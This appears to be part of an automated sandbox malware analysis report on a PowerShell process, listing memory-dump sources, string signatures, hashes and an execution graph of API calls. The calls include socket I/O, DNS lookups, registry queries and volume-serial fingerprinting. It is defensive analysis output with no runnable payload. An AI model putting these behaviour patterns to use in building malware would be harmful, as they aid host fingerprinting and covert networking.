                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8e1bbf6560c7789215cc0aa1c4aa68a8e9a590614c68570b8e5b9918bf9972b5
                                                                                                                                                            • Instruction ID: cbebdab3a8ef71b001361a11275cf87689c3e03d73c70d13325eb4a2e41b8824
                                                                                                                                                            • Opcode Fuzzy Hash: 8e1bbf6560c7789215cc0aa1c4aa68a8e9a590614c68570b8e5b9918bf9972b5
                                                                                                                                                            • Instruction Fuzzy Hash: 1221ADB030434A7BCB240E6E88147777F975FA1718F28842AA549CF2C5CA79D440C3F1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$t~qq$$^q$$^q$$^q$$^q
                                                                                                                                                            • API String ID: 0-1543618958
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                            • API String ID: 0-3512890053
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$4'^q$d%dq$d%dq$d%dq$d%dq$tP^q$tP^q$$^q
                                                                                                                                                            • API String ID: 0-202320237
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$tP^q$tP^q$$^q$(dq$(dq$(dq
                                                                                                                                                            • API String ID: 0-1710924510
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                                                                                                                                            • API String ID: 0-2461640029
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q$$^q
                                                                                                                                                            • API String ID: 0-2098638132
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                            • API String ID: 0-3272787073
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q
                                                                                                                                                            • API String ID: 0-3846404929
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$$^q$$^q$$^q$$^q
                                                                                                                                                            • API String ID: 0-2825857601
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: (o^q$(o^q$(o^q$(o^q
                                                                                                                                                            • API String ID: 0-1978863864
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                            • API String ID: 0-1420252700
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: XRcq$XRcq$tP^q$$^q
                                                                                                                                                            • API String ID: 0-3596674671
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                            • API String ID: 0-2125118731

Execution Graph

Execution Coverage: 3.3%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 2%
Total number of Nodes: 1128
Total number of Limit Nodes: 22
memset 13663->13664 13663->13671 13664->13671 13666 4d7fbd8 _mbstowcs_s free calloc free memset 13665->13666 13665->13671 13667 4d8644a 13666->13667 13668 4d7fbd8 _mbstowcs_s free calloc free memset 13667->13668 13667->13671 13669 4d86460 13668->13669 13670 4d7fab6 _mbstowcs_s calloc free memset 13669->13670 13669->13671 13670->13671 13671->13646 13672->13628 13679 4d84b36 13673->13679 13676 4d84b83 13720 4d84ba4 13676->13720 13680 4d84b4b 13679->13680 13681 4d84b31 13679->13681 13685 4d848b4 13680->13685 13681->13282 13681->13676 13692 4d848d2 13685->13692 13688 4d864bb 13689 4d864cf 13688->13689 13691 4d864c8 13688->13691 13708 4d8631d 13689->13708 13691->13681 13697 4d88268 13692->13697 13695 4d848cd 13695->13681 13695->13688 13698 4d848e8 13697->13698 13699 4d88287 __cfltcvt _mbstowcs_s 13697->13699 13698->13695 13702 4d8654c 13698->13702 13699->13698 13700 4d81929 _mbstowcs_s free calloc free memset 13699->13700 13701 4d7fe33 _mbstowcs_s calloc free memset 13699->13701 13700->13699 13701->13699 13703 4d8655c __cfltcvt 13702->13703 13704 4d87fe1 __cfltcvt 5 API calls 13703->13704 13707 4d8659a 13703->13707 13705 4d8656b 13704->13705 13706 4d865a0 __cfltcvt 12 API calls 13705->13706 13705->13707 13706->13707 13707->13695 13709 4d86336 __cfltcvt 13708->13709 13710 4d8636a 13709->13710 13711 4d8633c 13709->13711 13714 4d863a7 __cfltcvt 13709->13714 13710->13711 13717 4d7fcb6 13710->13717 13711->13691 13714->13711 13716 4d7fcb6 __cfltcvt memset 13714->13716 13715 4d7fcb6 __cfltcvt memset 13715->13711 13716->13711 13718 4d7fccc memset 13717->13718 13719 4d7fce5 13717->13719 13718->13719 13719->13711 13719->13715 13721 4d84b9f 13720->13721 13722 4d84bb0 13720->13722 13721->13279 13722->13721 13726 4d8490e 13722->13726 13724 4d84bd4 __cfltcvt 13724->13721 13725 4d7fcb6 __cfltcvt memset 13724->13725 13725->13721 13729 4d8492f 13726->13729 13730 4d8493f __cfltcvt 13729->13730 13731 4d8654c __cfltcvt 12 API calls 13730->13731 13732 4d8495a __cfltcvt 13731->13732 13735 
4d84971 13732->13735 13737 4d7f98a 13732->13737 13733 4d861bb __cfltcvt free 13734 4d8492a 13733->13734 13734->13724 13735->13733 13738 4d7f9a0 13737->13738 13741 4d7f9ad __cfltcvt 13737->13741 13739 4d7f9a7 13738->13739 13742 4d7f9b2 13738->13742 13740 4d7f848 _mbstowcs_s free 13739->13740 13740->13741 13741->13735 13743 4d7f9e7 memset 13742->13743 13744 4d7f9d5 13742->13744 13743->13741 13745 4d7f891 __cfltcvt calloc free 13744->13745 13745->13741 13747 4d7f46f 2 API calls 13746->13747 13748 4d7eb11 13747->13748 13749 4d7eafe 13748->13749 13750 4d7f42f free 13748->13750 13749->13193 13750->13749 14174 4d79c78 14175 4d79c81 14174->14175 14176 4d79c8b 14174->14176 14177 4d79c8e 5 API calls 14175->14177 14177->14176 12962 4d75365 12965 4d75378 12962->12965 12966 4d75382 12965->12966 12969 4d7a83a 12966->12969 12968 4d75376 12970 4d7a856 12969->12970 12971 4d7a846 12969->12971 12970->12971 12974 4d7afe4 12970->12974 12971->12968 12977 4d7b011 12974->12977 12975 4d7a87b 12975->12968 12976 4d7b047 12980 4d7b055 memset 12976->12980 12977->12975 12977->12976 12978 4d7b03a CreateEventA 12977->12978 12978->12976 12981 4d7b082 memset 12980->12981 12983 4d7b0c6 12981->12983 12984 4d7b0ce WSARecv 12981->12984 12983->12984 12985 4d7b110 GetLastError 12984->12985 12986 4d7b0f0 12984->12986 12985->12986 12987 4d7b11d WSAGetLastError 12985->12987 12990 4d7b16b RegisterWaitForSingleObject 12986->12990 12991 4d7b0fa 12986->12991 12988 4d7b127 WSAGetLastError 12987->12988 12989 4d7b12f WSAGetLastError 12987->12989 12988->12991 12989->12991 12990->12991 12991->12975 13950 4d734ef 13951 4d734fe 13950->13951 13953 4d73514 13951->13953 13956 4d742ec 13951->13956 13955 4d73554 13953->13955 13986 4d7210e 13953->13986 13957 4d74308 __cfltcvt 13956->13957 13958 4d74317 inet_addr 13957->13958 13959 4d74333 13958->13959 13960 4d7449b 13958->13960 13993 4d7a59e 13959->13993 13963 4d744b7 htons 13960->13963 13962 4d74347 13964 4d74351 13962->13964 13965 4d7438b strlen calloc 13962->13965 13967 
4d74383 13963->13967 13969 4d7436a htons 13964->13969 13966 4d743b1 13965->13966 13985 4d74475 13965->13985 14000 4d720bf memset 13966->14000 13967->13953 13969->13967 13970 4d743ba 13971 4d743d0 memset strlen 13970->13971 13972 4d76453 3 API calls 13971->13972 13973 4d743f8 13972->13973 13974 4d7447a 13973->13974 14001 4d741f6 13973->14001 14014 4d720d9 13974->14014 13979 4d74a6e free 13980 4d7448c free 13979->13980 13980->13985 13983 4d7444b 13984 4d7210e 70 API calls 13983->13984 13984->13985 13985->13967 14029 4d72258 malloc 13986->14029 13988 4d72126 14031 4d76594 malloc 13988->14031 13990 4d7214a 14034 4d722bc malloc 13990->14034 13994 4d7a5c7 13993->13994 13995 4d7a5a8 13993->13995 14025 4d7a5d6 13994->14025 13996 4d7a5ad 13995->13996 14018 4d7a6a3 memset 13995->14018 13996->13962 13999 4d7a5c5 13999->13962 14000->13970 14002 4d7421a __cfltcvt 14001->14002 14003 4d74226 memset getaddrinfo 14002->14003 14004 4d742db 14003->14004 14007 4d74263 __cfltcvt 14003->14007 14004->13974 14009 4d71a2b 14004->14009 14005 4d742d2 FreeAddrInfoW 14005->14004 14006 4d7428c 14006->14005 14007->14005 14007->14006 14008 4d742bd htons 14007->14008 14008->14005 14013 4d71a41 __cfltcvt 14009->14013 14010 4d71ac7 14010->13974 14010->13983 14011 4d71a7f strchr 14012 4d71a9d strlen 14011->14012 14011->14013 14012->14013 14013->14010 14013->14011 14015 4d7210a 14014->14015 14016 4d720e9 14014->14016 14015->13979 14016->14015 14017 4d720f6 free 14016->14017 14017->14016 14021 4d7a6cc 14018->14021 14019 4d7a6f3 strchr 14020 4d7a709 strchr 14019->14020 14019->14021 14020->14021 14021->14019 14022 4d7a7f4 14021->14022 14024 4d7a794 __cfltcvt 14021->14024 14023 4d7a5d6 strchr 14022->14023 14022->14024 14023->14024 14024->13999 14026 4d7a66f __cfltcvt 14025->14026 14028 4d7a5fb 14025->14028 14026->13999 14027 4d7a600 strchr 14027->14028 14028->14026 14028->14027 14030 4d72272 14029->14030 14030->13988 14032 4d765a4 memset 14031->14032 14033 4d765c6 14031->14033 14032->14033 14033->13990 
14035 4d722cc 14034->14035 14038 4d72303 14035->14038 14043 4d74fc6 14038->14043 14041 4d72180 14041->13955 14042 4d7234d free 14042->14041 14053 4d74f50 malloc 14043->14053 14045 4d74fd7 14046 4d74fe8 __cfltcvt 14045->14046 14047 4d75024 __cfltcvt 14045->14047 14052 4d7231d 14045->14052 14046->14052 14063 4d7be87 14046->14063 14059 4d7be45 14047->14059 14049 4d7501f 14051 4d7508a 39 API calls 14049->14051 14049->14052 14051->14052 14052->14041 14052->14042 14054 4d74f68 14053->14054 14055 4d74f6f free 14054->14055 14056 4d74f7b 14054->14056 14055->14045 14067 4d74f8b malloc memset 14056->14067 14058 4d74f87 14058->14045 14060 4d7be53 14059->14060 14062 4d7be72 14059->14062 14060->14062 14069 4d7b1b1 14060->14069 14062->14049 14064 4d7be95 14063->14064 14066 4d7beb5 14063->14066 14064->14066 14117 4d7b314 14064->14117 14066->14049 14068 4d74fad 14067->14068 14068->14058 14070 4d7b1d2 14069->14070 14075 4d7b1c9 14069->14075 14071 4d7b1eb 14070->14071 14080 4d7bdce 14070->14080 14073 4d7b21e memset 14071->14073 14071->14075 14084 4d7bf21 14071->14084 14077 4d7b25d 14073->14077 14075->14062 14077->14075 14078 4d7b2af GetLastError 14077->14078 14078->14075 14079 4d7b2bc WSAGetLastError 14078->14079 14079->14075 14081 4d7bdda 14080->14081 14083 4d7bdf5 14080->14083 14081->14083 14087 4d7ab5a 14081->14087 14083->14071 14115 4d7bee9 WSAIoctl 14084->14115 14090 4d7ab70 14087->14090 14089 4d7ab6c 14089->14083 14091 4d7abe7 bind 14090->14091 14092 4d7ab7e socket 14090->14092 14093 4d7abfb WSAGetLastError 14091->14093 14098 4d7ab98 14091->14098 14094 4d7ab92 WSAGetLastError 14092->14094 14095 4d7aba8 SetHandleInformation 14092->14095 14093->14098 14094->14098 14096 4d7abb7 GetLastError 14095->14096 14097 4d7abd1 14095->14097 14099 4d7abc6 14096->14099 14103 4d7ac1b ioctlsocket 14097->14103 14098->14089 14102 4d7abc8 closesocket 14099->14102 14101 4d7abe0 14101->14091 14101->14102 14102->14098 14104 4d7ac57 CreateIoCompletionPort 14103->14104 14105 4d7ac41 WSAGetLastError 
14103->14105 14106 4d7ac73 14104->14106 14109 4d7ac79 14104->14109 14110 4d7ac47 14105->14110 14107 4d7acaf GetLastError 14106->14107 14106->14109 14107->14110 14108 4d7aca9 14108->14110 14111 4d7ad14 setsockopt _errno 14108->14111 14113 4d7acdc 14108->14113 14109->14108 14112 4d7aca0 SetFileCompletionNotificationModes 14109->14112 14110->14101 14111->14113 14112->14108 14113->14110 14114 4d7ad4b _errno 14113->14114 14114->14110 14116 4d7b20e 14115->14116 14116->14073 14116->14075 14118 4d7b335 14117->14118 14127 4d7b32c 14117->14127 14119 4d7b34f 14118->14119 14128 4d7be09 14118->14128 14121 4d7b382 memset 14119->14121 14122 4d7bf21 WSAIoctl 14119->14122 14119->14127 14124 4d7b3c1 14121->14124 14123 4d7b372 14122->14123 14123->14121 14123->14127 14125 4d7b413 GetLastError 14124->14125 14124->14127 14126 4d7b420 WSAGetLastError 14125->14126 14125->14127 14126->14127 14127->14066 14129 4d7be31 14128->14129 14130 4d7be15 14128->14130 14129->14119 14130->14129 14132 4d7ada5 14130->14132 14133 4d7ab70 15 API calls 14132->14133 14134 4d7adb7 14133->14134 14134->14129 14135 4d7531f 14136 4d751cd 7 API calls 14135->14136 14137 4d7533c 14136->14137 13751 4d732b0 calloc 13752 4d732d4 memset time srand calloc 13751->13752 13753 4d734e2 13751->13753 13755 4d734b7 free 13752->13755 13757 4d7333a 13752->13757 13755->13753 13779 4d747fd 13757->13779 13759 4d73358 13791 4d75725 13759->13791 13761 4d73366 memset strlen 13794 4d76453 13761->13794 13763 4d73385 13764 4d7349a 13763->13764 13799 4d7993f 13763->13799 13766 4d74a6e free 13764->13766 13768 4d734a3 13766->13768 13767 4d73395 13770 4d7346c 13767->13770 13771 4d73409 calloc 13767->13771 13769 4d734ab free 13768->13769 13769->13755 13802 4d799db 13770->13802 13771->13770 13772 4d7341f 13771->13772 13773 4d73459 strlen 13772->13773 13775 4d7342a sprintf 13772->13775 13773->13770 13775->13775 13777 4d73456 13775->13777 13777->13773 13778 4d73490 free 13778->13764 13810 4d776f6 13779->13810 13781 4d74816 GetCurrentProcess 13815 
4d7327f GetModuleHandleA GetProcAddress 13781->13815 13785 4d74891 GetSystemDirectoryW 13789 4d748a7 GetVolumeInformationW 13785->13789 13790 4d748cc __cfltcvt 13785->13790 13786 4d74849 RegQueryValueExW 13787 4d7486f 13786->13787 13788 4d74888 RegCloseKey 13786->13788 13787->13788 13788->13785 13789->13790 13790->13759 13818 4d7f5d6 memset 13791->13818 13793 4d75743 13793->13761 13795 4d76462 strlen 13794->13795 13796 4d76469 13794->13796 13795->13796 13819 4d764ab 13796->13819 13798 4d76477 13798->13763 13800 4d79c78 5 API calls 13799->13800 13801 4d7994e 13800->13801 13801->13767 13805 4d799e6 13802->13805 13803 4d73488 13803->13764 13803->13778 13805->13803 13807 4d79a1b 13805->13807 13824 4d79b1e 13805->13824 13834 4d79cdf GetTickCount 13805->13834 13807->13803 13807->13805 13836 4d79a96 13807->13836 13840 4d79c10 13807->13840 13811 4d77703 13810->13811 13812 4d776ff 13810->13812 13817 4d76636 memset 13811->13817 13812->13781 13814 4d77710 13814->13781 13816 4d732a2 RegOpenKeyExW 13815->13816 13816->13785 13816->13786 13817->13814 13818->13793 13820 4d764df 13819->13820 13821 4d764bc memcmp 13819->13821 13822 4d764d0 13820->13822 13823 4d764e4 memcmp 13820->13823 13821->13820 13821->13822 13822->13798 13823->13822 13825 4d79be4 13824->13825 13826 4d79b30 13824->13826 13825->13807 13826->13825 13828 4d79b7f 13826->13828 13847 4d7ba74 13826->13847 13852 4d7b62c 13826->13852 13865 4d7b985 13826->13865 13872 4d7cfe4 13826->13872 13879 4d7c9b6 13826->13879 13828->13826 13859 4d7b8aa 13828->13859 13835 4d79cee 13834->13835 13835->13805 13838 4d79a9b 13836->13838 13837 4d79af4 13837->13807 13838->13837 13929 4d7a964 13838->13929 13841 4d79c26 GetQueuedCompletionStatus 13840->13841 13842 4d79c1f 13840->13842 13844 4d79c51 GetLastError 13841->13844 13846 4d79c43 13841->13846 13946 4d7a3bd 13842->13946 13844->13846 13846->13807 13848 4d7ba82 13847->13848 13849 4d7bab7 setsockopt 13848->13849 13850 4d7bad2 13848->13850 13849->13850 13851 4d7baf0 WSAGetLastError 
13849->13851 13850->13826 13851->13850 13856 4d7b6db 13852->13856 13858 4d7b64c 13852->13858 13853 4d7b719 WSARecv 13854 4d7b7e3 WSAGetLastError 13853->13854 13853->13856 13857 4d7b762 13854->13857 13855 4d7b055 8 API calls 13855->13858 13856->13853 13856->13857 13857->13855 13857->13858 13858->13826 13863 4d7b8c0 13859->13863 13860 4d7b900 13862 4d7b90e 13860->13862 13864 4d7b907 CloseHandle 13860->13864 13861 4d7b8f9 UnregisterWait 13861->13860 13862->13828 13863->13860 13863->13861 13863->13862 13864->13862 13866 4d7b9ea 13865->13866 13871 4d7b998 13865->13871 13867 4d7b9f4 setsockopt 13866->13867 13868 4d7ba31 closesocket 13866->13868 13867->13868 13867->13871 13869 4d7ba44 13868->13869 13868->13871 13885 4d7adbb socket 13869->13885 13871->13826 13873 4d7d003 13872->13873 13874 4d7d0b9 memset WSARecvFrom 13873->13874 13878 4d7d01f 13873->13878 13876 4d7d10f WSAGetLastError 13874->13876 13874->13878 13876->13878 13877 4d7d1a8 13877->13826 13878->13877 13901 4d7ce0a memset 13878->13901 13880 4d7c9d0 13879->13880 13881 4d7c9c9 13879->13881 13916 4d7cafe 13880->13916 13912 4d7c9da 13881->13912 13884 4d7c9ce 13884->13826 13886 4d7adf5 13885->13886 13887 4d7ae1d SetHandleInformation 13885->13887 13886->13871 13888 4d7ae2c 13887->13888 13889 4d7ae68 memset 13887->13889 13898 4d7ae57 closesocket 13888->13898 13890 4d7ae85 13889->13890 13891 4d7aeb5 13890->13891 13892 4d7aed4 GetLastError 13890->13892 13891->13886 13896 4d7af51 RegisterWaitForSingleObject 13891->13896 13892->13891 13893 4d7aee1 WSAGetLastError 13892->13893 13894 4d7aef3 WSAGetLastError 13893->13894 13895 4d7aeeb WSAGetLastError 13893->13895 13897 4d7af03 13894->13897 13895->13897 13896->13886 13899 4d7af0f closesocket 13897->13899 13898->13886 13899->13886 13900 4d7af22 CloseHandle 13899->13900 13900->13886 13902 4d7cf07 13901->13902 13903 4d7ce3b memset 13901->13903 13905 4d7cf5c GetLastError 13902->13905 13911 4d7ce9d 13902->13911 13907 4d7ce99 13903->13907 13906 4d7cf69 WSAGetLastError 13905->13906 
13905->13911 13908 4d7cf73 WSAGetLastError 13906->13908 13909 4d7cf7b WSAGetLastError 13906->13909 13910 4d7cecf GetLastError 13907->13910 13907->13911 13908->13911 13909->13911 13910->13911 13911->13877 13915 4d7c9ef 13912->13915 13913 4d7cad4 13913->13884 13915->13913 13920 4d7c71a 13915->13920 13917 4d7cb13 13916->13917 13918 4d7cbaf 13917->13918 13925 4d7c83a 13917->13925 13918->13884 13921 4d7c733 memset 13920->13921 13923 4d7c391 7 API calls 13921->13923 13924 4d7c7d6 13923->13924 13924->13913 13926 4d7c850 QueueUserWorkItem 13925->13926 13928 4d7c8ab 13926->13928 13928->13918 13930 4d7a97d 13929->13930 13932 4d7aa48 13929->13932 13931 4d7a991 13930->13931 13930->13932 13933 4d7a9db shutdown 13931->13933 13938 4d7a9ce 13931->13938 13934 4d7aa64 closesocket 13932->13934 13932->13938 13942 4d7aa70 13932->13942 13935 4d7a9f1 WSAGetLastError 13933->13935 13933->13938 13934->13942 13935->13938 13936 4d7aaf6 13936->13938 13939 4d7ab17 13936->13939 13940 4d7ab0c UnregisterWait 13936->13940 13937 4d7aae9 free 13937->13936 13938->13838 13939->13938 13941 4d7ab1e CloseHandle 13939->13941 13940->13939 13941->13938 13942->13936 13942->13937 13943 4d7aaab UnregisterWait 13942->13943 13944 4d7aac5 CloseHandle 13942->13944 13945 4d7aae7 13942->13945 13943->13942 13944->13942 13945->13937 13947 4d7a3ce 13946->13947 13948 4d79cdf GetTickCount 13947->13948 13949 4d79c25 13947->13949 13948->13949 13949->13841 12843 4d750a6 12844 4d750b3 12843->12844 12847 4d750c1 12844->12847 12851 4d7511c 12844->12851 12858 4d74a6e 12847->12858 12865 4d7f4f8 12851->12865 12853 4d75127 12854 4d74a6e free 12853->12854 12855 4d75133 12854->12855 12881 4d75145 memset 12855->12881 12857 4d75139 free 12857->12847 12859 4d74a8e 12858->12859 12860 4d74a7b 12858->12860 12862 4d750e9 12859->12862 12860->12859 12949 4d749fc 12860->12949 12952 4d7a4d6 12862->12952 12864 4d750db 12866 4d7f505 _mbstowcs_s 12865->12866 12876 4d7f5b9 _mbstowcs_s 12865->12876 12867 4d7f547 12866->12867 12869 4d7f53f free 
12866->12869 12868 4d7f554 12867->12868 12883 4d7f42f 12867->12883 12880 4d7f577 12868->12880 12889 4d7f46f 12868->12889 12869->12867 12871 4d7f596 12875 4d7f5a7 strlen 12871->12875 12871->12876 12873 4d7f4cb free 12873->12871 12874 4d7f567 12877 4d7f42f free 12874->12877 12875->12876 12876->12853 12878 4d7f56f 12877->12878 12893 4d7f4cb 12878->12893 12880->12871 12880->12873 12882 4d75166 12881->12882 12882->12857 12884 4d7f45f _mbstowcs_s 12883->12884 12885 4d7f438 12883->12885 12884->12868 12897 4d82060 12885->12897 12887 4d7f456 12888 4d82060 free 12887->12888 12888->12884 12890 4d7f47b 12889->12890 12892 4d7f491 _mbstowcs_s 12889->12892 12901 4d84a37 12890->12901 12892->12874 12894 4d7f4ec _mbstowcs_s 12893->12894 12895 4d7f4d4 12893->12895 12894->12880 12895->12894 12896 4d7f4e1 free 12895->12896 12896->12894 12898 4d8209c _mbstowcs_s 12897->12898 12899 4d82069 _mbstowcs_s 12897->12899 12898->12887 12899->12898 12900 4d82090 free 12899->12900 12900->12898 12902 4d84a40 12901->12902 12910 4d84a6a 12901->12910 12911 4d861bb 12902->12911 12905 4d861bb __cfltcvt free 12906 4d84a58 12905->12906 12919 4d7f848 12906->12919 12910->12892 12912 4d861c4 12911->12912 12918 4d84a4c 12911->12918 12913 4d7f848 _mbstowcs_s free 12912->12913 12914 4d861ca 12913->12914 12915 4d7f848 _mbstowcs_s free 12914->12915 12916 4d861d3 12915->12916 12917 4d7f848 _mbstowcs_s free 12916->12917 12917->12918 12918->12905 12920 4d7f851 _mbstowcs_s 12919->12920 12921 4d7f86d 12919->12921 12920->12921 12922 4d7f861 free 12920->12922 12923 4d84a6f 12921->12923 12922->12921 12934 4d861e1 12923->12934 12925 4d84a7a 12926 4d7f848 _mbstowcs_s free 12925->12926 12927 4d84a83 12926->12927 12928 4d861bb __cfltcvt free 12927->12928 12929 4d84a8f 12928->12929 12930 4d861bb __cfltcvt free 12929->12930 12931 4d84a9b 12930->12931 12932 4d7f848 _mbstowcs_s free 12931->12932 12933 4d84aa7 12932->12933 12933->12910 12935 4d861ed 12934->12935 12936 4d86250 _mbstowcs_s 12934->12936 12937 4d7f848 _mbstowcs_s 
